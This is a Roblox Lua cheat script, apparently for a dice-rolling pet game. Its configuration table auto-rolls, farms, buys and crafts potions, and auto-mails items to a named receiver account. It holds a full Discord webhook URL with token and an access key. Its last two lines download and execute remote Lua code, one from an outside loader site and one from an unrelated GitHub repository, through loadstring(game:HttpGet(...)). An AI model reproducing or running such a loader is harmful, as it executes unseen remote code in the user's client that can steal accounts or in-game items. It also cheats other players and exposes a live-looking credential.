getgenv().Config = {
	["Sender"] = {
		["Minimum Chance"] = 10000000,
		["Auto Send Mail"] = true,
		["Receiver Name"] = "KennedyBilly8"
	},
	["Webhook"] = {
		["Mention"] = "@everyone",
		["URL"] = "https://discord.com/api/webhooks/1298238594309292032/ekejlGecYXjOCKb7m4fQjcMumXMPzuVx0eGXyZttSz6BPgo7aWoIA7rJYYWEbGCUXCXK",
		["Minimum Chance"] = 100000000,
		["Pet Rolled"] = true
	},
	["Consumer"] = {
		["Potion"] = {
			["Enable"] = true,
			["Potion"] = {
				["Coins Potion VII"] = true,
				["Walkspeed Potion III"] = true,
				["Instant Luck Potion III"] = true,
				["The Cocktail"] = true,
				["Faster Rolls Potion II"] = true,
				["Lucky Potion VII"] = true,
				["Blazing Dice Potion"] = true,
				["Breakables Potion III"] = true
			}
		},
		["Fruit"] = {
			["Enable"] = true,
			["Fruit"] = {
				["Watermelon"] = true,
				["Pineapple"] = true,
				["Rainbow"] = true,
				["Apple"] = true,
				["Orange"] = true,
				["Banana"] = true
			},
			["Consume Shiny"] = true
		}
	},
	["Interface"] = {
		["Auto Upgrade"] = true,
		["Auto Roll"] = true,
		["Fast Roll"] = true
	},
	["Upgrader"] = {
		["Rainbow"] = true,
		["Shiny"] = true,
		["Keep Amount"] = 100
	},
	["Resource"] = {
		["Auto Farm"] = true,
		["Auto Hidden Gift"] = true
	},
	["Receiver"] = {
		["Auto Claim Mail"] = true
	},
	["Performance"] = {
		["Disable LocalScript"] = true,
		["Boost FPS"] = true
	},
	["Buyer"] = {
		["Merchant"] = {
			["Enable"] = true,
			["Item"] = {
				["Coins Potion II"] = true,
				["The Cocktail"] = true,
				["Lucky Potion V"] = true,
				["Faster Rolls Potion I"] = true,
				["Faster Rolls Potion II"] = true,
				["Instant Luck Potion I"] = true,
				["Coins Potion I"] = true,
				["Breakables Potion I"] = true,
				["Golden Dice Potion"] = true,
				["Items Potion II"] = true,
				["Coins Potion III"] = true,
				["Coins Potion V"] = true,
				["Rainbow Dice Potion"] = true,
				["Instant Luck Potion II"] = true,
				["Lucky Potion I"] = true,
				["Breakables Potion II"] = true,
				["Lucky Potion III"] = true,
				["Blazing Dice Potion"] = true,
				["Coins Potion IV"] = true,
				["Instant Luck Potion III"] = true,
				["Lucky Potion IV"] = true,
				["Items Potion I"] = true,
				["Lucky Potion II"] = true
			}
		},
		["Potion Vending"] = true,
		["Index Shop"] = {
			["Enable"] = true,
			["Item"] = {
				["Coins Potion II"] = true,
				["Lucky Potion IV"] = true,
				["Rainbow Dice Potion"] = true,
				["Faster Rolls Potion I"] = true,
				["Instant Luck Potion I"] = true,
				["Coins Potion I"] = true,
				["Breakables Potion I"] = true,
				["Golden Dice Potion"] = true,
				["Ice Cream Hoverboard"] = true,
				["Coins Potion III"] = true,
				["Coins Potion V"] = true,
				["Instant Luck Potion II"] = true,
				["Instant Luck Potion III"] = true,
				["Lucky Potion I"] = true,
				["Breakables Potion II"] = true,
				["Lucky Potion III"] = true,
				["Coins Potion IV"] = true,
				["Lucky Potion II"] = true,
				["Ice Cream Booth"] = true,
				["Rave Crab Booth"] = true,
				["Lucky Potion V"] = true,
				["Rave Crab Hoverboard"] = true
			}
		}
	},
	["Crafter"] = {
		["Enable"] = true,
		["Potion"] = {
			["Coins Potion II"] = true,
			["Lucky Potion VI"] = true,
			["Lucky Potion II"] = true,
			["Coins Potion VI"] = true,
			["Walkspeed Potion II"] = true,
			["Faster Rolls Potion I"] = true,
			["Coins Potion VII"] = true,
			["Lucky Potion VII"] = true,
			["Lucky Potion V"] = true,
			["Coins Potion V"] = true,
			["Faster Rolls Potion II"] = true,
			["Instant Luck Potion I"] = true,
			["Golden Dice Potion"] = true,
			["Coins Potion III"] = true,
			["Breakables Potion I"] = true,
			["Instant Luck Potion II"] = true,
			["Items Potion II"] = true,
			["Coins Potion IV"] = true,
			["Items Potion IV"] = true,
			["Walkspeed Potion III"] = true,
			["Walkspeed Potion I"] = true,
			["Breakables Potion III"] = true,
			["Items Potion III"] = true,
			["Breakables Potion II"] = true,
			["Lucky Potion III"] = true,
			["Blazing Dice Potion"] = true,
			["Lucky Potion IV"] = true,
			["Instant Luck Potion III"] = true,
			["Rainbow Dice Potion"] = true,
			["Items Potion I"] = true,
			["The Cocktail"] = true
		}
	}
}
getgenv().Key = "k075b86b9f53c79b161126dc"
loadstring(game:HttpGet("https://nousigi.com/loader.lua"))()
loadstring(game:HttpGet("https://raw.githubusercontent.com/hoanghuyff/av/refs/heads/main/cac"))()
